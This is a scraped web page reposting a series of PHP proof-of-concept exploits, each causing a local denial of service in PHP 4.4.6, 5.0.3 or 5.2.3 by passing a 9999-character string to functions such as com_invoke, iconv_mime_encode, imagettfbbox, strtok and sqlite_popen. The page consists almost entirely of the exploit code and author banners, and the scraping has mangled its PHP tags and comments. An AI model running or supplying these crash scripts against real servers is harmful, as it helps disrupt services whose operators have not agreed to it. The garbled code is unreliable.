Com_invoke ()
// ==================================================================================
//
PHP 4.4.6 Com_invoke () Local denial of Service
//
Tested on WIN XP, Apache, PHP 4.4.6. Local denial of Service.
//
Local denial of Service
author:pr0t3ct10n >
Http://www.nullbyte.org.il
//
// ==================================================================================
$buffer = Str_repeat ("A", 9999);
Com_invoke ($buffer, 1);
?>
Com_propput ()
// ==================================================================================
//
PHP 4.4.6 com_propput () Local denial of Service
//
Tested on WIN XP, Apache, PHP 4.4.6. Local denial of Service.
//
Local denial of Service
author:pr0t3ct10n <> >
Http://www.nullbyte.org.il
//
// ==================================================================================
$buffer = Str_repeat ("A", 9999);
Com_propput (1, 1, $buffer);
?>
Com_propset ()
// ==================================================================================
//
PHP 4.4.6 com_propset () Local denial of Service
//
Tested on WIN XP, Apache, PHP 4.4.6. Local denial of Service.
//
Local denial of Service
author:pr0t3ct10n <> >
Http://www.nullbyte.org.il
//
// ==================================================================================
$buffer = Str_repeat ("A", 9999);
Com_propset (1, 1, $buffer);
?>
Iconv_mime_encode ()
!--? php //==================================================================== ==============
//
//php 5.0.3 Iconv_mime_encode () Local denial of Service
//
//Tested on WIN XP, Apache, PHP 5.0.3. Local denial of Service.
//
//Local denial of Service
//author:pr0t3ct10n >
//http://www.nullbyte.org.il
//
//================================================================== ================
$buff = str_repeat ("A", 9999);
Iconv_mime_encode ($buff, 1);
?>
Imageftbbox ()
!--? php //=========================================================================== =======
//
//php 5.0.3 Imageftbbox () Local denial of Service
//
//Tested on WIN XP, Apache, PHP 5.0.3. Local denial of Service.
//
//Local denial of Service
//author:pr0t3ct10n >
//http://www.nullbyte.org.il
//
//================================================================== ================
$buff = str_repeat ("A", 9999);
Imageftbbox (1, 1, $buff, 1);
?>
Com_set ()
// ==================================================================================
//
PHP 4.4.6 com_set () Local denial of Service
//
Tested on WIN XP, Apache, PHP 4.4.6. Local denial of Service.
//
Local denial of Service
author:pr0t3ct10n <> >
Http://www.nullbyte.org.il
//
// ==================================================================================
$buffer = Str_repeat ("A", 9999);
Com_set (1, 1, $buffer);
?>
Strtok ()
!--? php //================================================================================ = =
//
//php 5.2.3 Strtok () Local denial of Service
//
//Tested on WIN XP, Apache, PHP 5.2.3. Local denial of Service.
//
//Local denial of Service
//author:pr0t3ct10n >
//http://www.nullbyte.org.il
//
//================================================================== ================
$buff = str_repeat ("A", 9999);
Strtok ($buff);
?>
Sqlite_popen ()
!--? php //========================================================================= =========
//
//php 5.0.3 Sqlite_popen () Local denial of Service
//
//Tested on WIN XP, Apache, PHP 5.0.3. Local denial of Service.
//
//Local denial of Service
//author:pr0t3ct10n >
//http://www.nullbyte.org.il
//
//================================================================== ================
$buff = str_repeat ("A", 9999);
Sqlite_popen ($buff);
?>
Imagettfbbox ()
// ==================================================================================
//
PHP 5.0.3 imagettfbbox () Local denial of Service
//
Tested on WIN XP, Apache, PHP 5.0.3. Local denial of Service.
//
Local denial of Service
author:pr0t3ct10n <> >
Http://www.nullbyte.org.il
//
// ==================================================================================
$buff = Str_repeat ("A", 9999);
Imagettfbbox (1, 1, $buff, 1);
?>
http://www.bkjia.com/PHPjc/508453.html www.bkjia.com true http://www.bkjia.com/PHPjc/508453.html techarticle com_invoke ()? PHP//==================================================================================//// PHP 4.4.6 Com_invoke () Local denial of Service////Tested on WIN XP,...